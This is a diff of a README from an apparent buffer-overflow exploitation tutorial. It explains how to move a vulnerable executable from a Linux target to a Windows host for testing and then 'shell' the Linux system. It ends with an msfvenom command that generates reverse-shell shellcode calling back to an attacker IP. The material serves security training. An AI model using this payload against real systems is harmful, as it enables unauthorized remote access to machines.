johnjhacking/Buffer-Overflow-Guide/README.md

 1. If you don't want to use a Linux Debugging program, that's fine; you can use Immunity, but please let me explain.
 2. If you're attacking a Linux machine, copy the EXE that you find over to your Windows host.
-3. Perform testing with the same methodology defined above, with a few differences:
--Use your Windows IP address within all of the scripts.
-The testing process isn't going to work with the Linux Machine's IP address.
--You will have to generate Linux Shellcode.
+3. Perform testing with the same methodology defined above, with a few differences: Use your Windows IP address within all of the scripts.
+The testing process isn't going to work with the Linux Machine's IP address.You will have to generate Linux Shellcode.
 4. Once you have shelled your Windows system, it's time to make some quick changes to shell the Linux system.
 5. Generate Linux Shellcode:
 **Command: msfvenom -p linux/x86/shell_reverse_tcp lhost=10.2.12.189 lport=4444 -f python -b '\x00'**